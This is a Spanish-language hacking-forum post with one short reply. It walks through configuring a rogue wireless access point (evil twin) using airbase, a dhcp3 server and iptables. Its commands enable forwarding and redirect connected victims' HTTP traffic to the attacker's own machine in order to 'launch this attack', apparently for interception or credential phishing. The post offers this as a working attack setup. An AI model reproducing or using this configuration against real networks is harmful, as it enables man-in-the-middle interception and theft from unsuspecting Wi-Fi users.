Hola a todos,seguro que conocen esta tecnica,como el foro me ayudo mucho, quiero compartir un poco de lo que me costo aprender tanto ip tables como dhcp para poder configurar correctamente mi red y lograr lanzar este ataque.Les dejo este video,disculpen que es muy largo,iva a poner imagenes pero nose en que host debia alojarlos,ya que el host que sugiere D3MON no deja subir mas imagenes
Use dos adaptadores wireless para hacer esta prueba:
wlan0 = para tener internet
wlan1 = modo monitor ,crear ap con airbase,etc
Explicacion de algunos comandos para su mayor entendimiento de lo que se hace y se pone,para sacarse cualquier duda.ddns-update-style ad-hoc;//el método de actualización DNS automática con los valores de la IP asignados por DHCP (en este caso tipo ad-hoc).
default-lease-time 600; //es el tiempo de préstamo por defecto de la dirección IP y está medido en segundos.
max-lease-time 7200; //es el tiempo máximo que debe durar una dirección IP antes que caduque y el cliente deba pedir otra vez una dirección.
subnet 10.0.0.0 netmask 255.255.0.0 {
option subnet-mask 255.255.0.0; //Mascara de red de la subred
option broadcast-address 10.0.255.255; //Es la dirección de broadcast de nuestra red.
option routers 10.0.0.2; //Es la dirección IP de nuestro gateway (ip del router).
option domain-name-servers 8.8.8.8;//Es la dirección IP de nuestros servidores DNS (puede ser la ip de tu router o usar dns publicas como la de google).
range 10.0.0.50 10.0.0.150; //el rango de las direcciones que puede asignar el servidor DHCP
}
subnet=Segmento de subred sobre el cual actuara el dhcp.
netmask=Mascara de red de la subred
Los 4 primeros comandos limpian las reglas del firewall para establecerlas.
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
El 5 comando indica que el enrutamiento debe ser tratado por la interface de salida wlan1:
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
Habilitar el IP Forwarding:
El IP Forwarding sirve para darle capacidad de Router a nuestro servidor es decir que pueda recibir y reenviar los paquetes por una o varias interfaces
echo "1" > /proc/sys/net/ipv4/ip_forward
Redireccionar el tráfico hacia tu ip:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.12:88
enmascarar la dirección IP:
iptables -t nat -A POSTROUTING -j MASQUERADE
at0 up // levantamos la red que creo airbase
at0 10.0.0.2 netmask 255.255.0.0 //se define la dirección IP del gateway y la mascara de red
route add -net 10.0.0.0 netmask 255.255.0.0 gw 10.0.0.2 //finalmente adicionamos el enrutamiento para la red 10.0.0.0 , la mascara de red y el gateway de la subred.
dhcp3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 //crear un enlace simbolico apuntando al pid.
/etc/init.d/dhcp3-server start // iniciar el servidor dhcp3 server
FORWARD: paquetes que pasan por nuestra máquina.
POSTROUTING: Los paquetes salientes pasan por esta cadena después de haberse tomado la decisión del ruteo.
MASQUERADE: Enmascarar la dirección IP del cliente o la dirección de red respectivamente.
ip-router =10.0.0.2 //poner tu ip del router
ip-privada = 10.0.0.12 //poner tu ip privada
subnet = 10.0.0.0 //desde ahi empieza mi red
netmask =255.255.0.0 //esa es mi mascara de subred,puede ser distinto (ejemplo:255.255.255.1)
Creo que no me olvide mas nada :-[ si tienen alguna duda me preguntan..algunos conceptos estan explicados a lo "humano" ya que sino seria un tutorial muy largo y explicativo,disculpen los errores ortograficos.
PD.:el video creo q se hizo muy largo
Interesante tu información, igual es un poco evidente el método pero quizás funcione.